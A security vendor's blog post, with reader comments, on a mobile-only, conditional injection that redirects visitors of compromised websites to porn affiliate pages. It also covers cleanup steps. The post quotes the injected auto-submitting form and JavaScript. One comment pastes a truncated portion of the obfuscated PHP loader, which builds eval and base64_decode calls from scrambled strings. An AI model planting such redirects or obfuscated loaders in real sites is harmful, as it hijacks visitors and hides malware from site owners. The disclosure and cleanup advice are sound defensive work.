BaDoink Website Redirect – Malicious Redirections to Porn Websites on Mobile Devices

The past week has brought about a large number of cases where compromised websites had hidden redirections to porn injected into their code. All the infections had a similar pattern where they only targeted mobile devices. They are highly conditional as well making it challenging for webmasters to detect.

Lets take a minute to explain what is going on.

Conditional Redirects to Porn Websites Targeting Mobile Devices

Sounds complicated, but it isn’t. If the visitor is coming from an Ipad, Iphone, Android or other similar mobile device, the page is redirected to a random pornographic page. If the same person tries to visit the site again, nothing happens and the site loads properly. What gives?

1. The Word is “Conditional”

The malware injected on the website is intelligent. It stores the IP address for all the visitors that it redirects to the porn website. If you see the redirect once, it is likely that you won’t see it again for many hours. This makes the malware very difficult to detect and leads people to think it was a random error or that maybe they mistyped the URL.

2. Mobile-Only

This injection is only redirecting Mobile browsers. It’s targets seems to be iPhone, iPad, Android and a few other mobile OS browsers. For everyone else, the site looks clean and safe.

3. Mobile-only + Conditional = Very hard to detect

When you mix conditional with mobile-specific infections, you know it will be very difficult to detect. Yes, even SiteCheck has a hard time flagging it. It will flag the site once, but if the user forces a re-scan it will show the website as clean.

As you can imagine, it can be very confusing for the end user.

Browser-site injection

Rafael Capovilla, one of our Sr. Analysts, was the first to find and decipher how the injection is displayed on the browser. It is very sneaky, accomplishing it’s goal by utilizing a form like this one:

<form method=POST action="http://gridironservices.com/579205f64a3c6…php?q=b9f6606dcd0186725..” id=”refoto_form” target=”_top”>

With random domains (intelligenthometheater.com, gridironservices.com, etc). That by itself it looks ok, but embedded you’ll find this javascript code:

document.getElementById("refoto_form"). submit( );

This forces the POST to be submitted and the visitor redirected. At first glance they both look legitimate and will likely pass as clean for most (if not all) Anti-Virus and security tools.

As mentioned before, this only appears on Mobile devices and conditionally. You might be wondering why they would redirect to porn. As is often the case, it’s all about the money.

These pages are the first level in the redirection funnel. They proceed to push the user to affiliate/ads links, similar to these: httx://ads. mobiteasy.com/ or httx://www. instabang.com/tour/zinstabang.

Where they pay the malware authors good money for every click.

Removing the Porn Redirection

Shameless Plug: If you have used SiteCheck and notice the issue I mentioned above – showing dirty then clean or not showing at all – have no fear, this does happen from time to time it’s how the scanner works. Rest assured though that our team is able to address the issue and our internal scanners will catch the issue outright once configured.

To address the issue yourself investigate these locations:

  • /index.php
  • /wp-config.php (if using WordPRess)
  • /configuration.php (if using Joomla)
  • /wp-content/themes/yourtheme/functions.php (if using WordPress)

These are the 4 places we see this injection being added. Note that it is highly encoded, you will have to look for any line that looks out of place and it’s best to engage your developer for help.

Remember, the issue at the surface – the infection – is only the tip of the iceberg. If your website is infected you have to assume that the attackers have penetrated your defenses and have added controls that will allow them to continue to penetrate your environment. Be sure to look for backdoors.

If you have any question, let us know. You can also engage us on Twitter at Sucuri Support or Sucuri Labs.

Scan your website for free:
About Daniel Cid

Daniel B. Cid is the CTO&Founder of Sucuri and the founder of the open source OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid

  • Kyle Tripp

    A good way to find malicious code hidden in a configuration file is to download the original file again and do a diff against it, normally the only lines that are different are the database connection

  • George

    This exact symptoms happen to my WordPress site, so I re-installed WordPress, plugins & theme files (all latest version), but the symptoms still happened. I’ve investigated the files index.php, wp-config.php & my theme’s functions.php file but found nothing.

    When I scanned my site using Sucuri scanner, it said there’re malware, and it disclosed a “suspicious” script hosted externally. The script is an advertisement script from a Russian ad agency that bought banner ad placement on my site. So, I’m guessing this is where it’s hidden. Am I right?

    • perezbox

      Possibly, hard to say without diving into the site itself. Are you an existing client?

      • George

        No, I’m not an existing client. But the scan is clean when I removed the ad code.

    • http://watwebdev.com/ David Watkinson

      I saw the same happen a long time ago when I used a smaller advertising network which still exists today. I wont name them. However, they only checked the ad when it was submitted. To save time, they didnt check revisions. So you would get an advert submission for something normal like a pair of shoes. After the advert was accepted, they would change it to malware. If the link and category are unchanged, then they dont re-authenticate it.
      Remove the ad code from your site, scan again, if it is clean, report it to the ad agency. If you leave it on your site, it could be removed from google to protect users.

      • George

        Yes, the scan is clean now when I removed the script. THANK YOU!!

        • http://watwebdev.com/ David Watkinson

          You’re welcome. Did the advertiser begin with the letter B?

  • http://www.sinelogix.com ketul

    Yeah. Great article that very useful.

  • Henry

    For the longest time i have been scratching my head over this. Thanks to this post and others, i managed to solve my issue. I just want to share how i did, to return the favor.

    In my case, I am using wordpress and there were two files that were affected.

    /index.php
    /wp-content/themes/YourWordpressTheme/index.php

    When you open the two files, you will see that there are a bunch of jumbled code inside, like

    “function POdaAm1RYOEnqZI5($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v){return str_replace($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v);} function I8BRJNlvVcv8BKEn($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v){return str_replace($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v);} function I0amzoGWejZvWj1qMXXyLvu($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v){return str_replace($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v);} $apXLsRB9qp1jAdt2 = ‘bljoeka8eAj6wpeJaljoeka8eAj6wpeJsljoeka8eAj6wpeJeljoeka8eAj6wpeJ6ljoeka8eAj6wpeJ4ljoeka8eAj6wpeJ_ljoeka8eAj6wpeJdljoeka8eAj6wpeJeljoeka8eAj6wpeJcljoeka8eAj6wpeJoljoeka8eAj6wpeJdljoeka8eAj6wpeJe’; $apXLsRB9qp1jAdt2 = I0amzoGWejZvWj1qMXXyLvu(‘ljoeka8eAj6wpeJ’,”,$apXLsRB9qp1jAdt2); $WETSqAfZOqV73vT = ‘cOuwZMdqMtFDD6HrOuwZMdqMtFDD6HeOuwZMdqMtFDD6HaOuwZMdqMtFDD6HtOuwZMdqMtFDD6HeOuwZMdqMtFDD6H_OuwZMdqMtFDD6HfOuwZMdqMtFDD6HuOuwZMdqMtFDD6HnOuwZMdqMtFDD6HcOuwZMdqMtFDD6HtOuwZMdqMtFDD6HiOuwZMdqMtFDD6HoOuwZMdqMtFDD6Hn’; $WETSqAfZOqV73vT = I0amzoGWejZvWj1qMXXyLvu(‘OuwZMdqMtFDD6H’,”,$WETSqAfZOqV73vT); $JsmNP8kuxuqpV = ‘gYI6cMgcLlDVegYI6cMgcLlDVvgYI6cMgcLlDVagYI6cMgcLlDVl’; $JsmNP8kuxuqpV = I0amzoGWejZvWj1qMXXyLvu(‘gYI6cMgcLlDV’,”,$JsmNP8kuxuqpV); $D4gkz02Pq8F5pq2iLMd3ZQ = ‘$ynk5tMJWc7CSwVHPzj52BAPu’; $YX13lmjB70wdaV33Ak25fhm = $WETSqAfZOqV73vT($D4gkz02Pq8F5pq2iLMd3ZQ,$JsmNP8kuxuqpV.’(‘.$apXLsRB9qp1jAdt2.’(‘.$D4gkz02Pq8F5pq2iLMd3ZQ.’));’); $YX13lmjB70wdaV33Ak25fhm(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVVRJeGMySlZiRVJhTW1oaFlteGFNVmRVVGxOalIwbDVUbGRh

    This is just a portion of it, but basically you should be able to see the “>?php” then follow by function or str replace..” and a lot of the gibberish code.

    What i did was just to remove all the gibberish and have only the original stuff left. For wordpress index.php, the original file is

    ——————————

    ——————————

    Make sure the “” is at the end. Otherwise you will have errors going to your website url.

    I also made sure my index.php and .htaccess file permissions is 644 instead of 755. Not sure if this will help but i think its probably more secure.

    Hope this help others :)

    Cheers,
    Henry

    • Nick

      OK, so you removed the bad code from your site.

      What did you do to isolate the _cause_ of the compromise?

      Or is your site just sitting there waiting to get shat all over again?

  • Pam

    How do you fix this problem? I am not that computer (iPad) savvy. Can you do it yourself at home? How? Thanks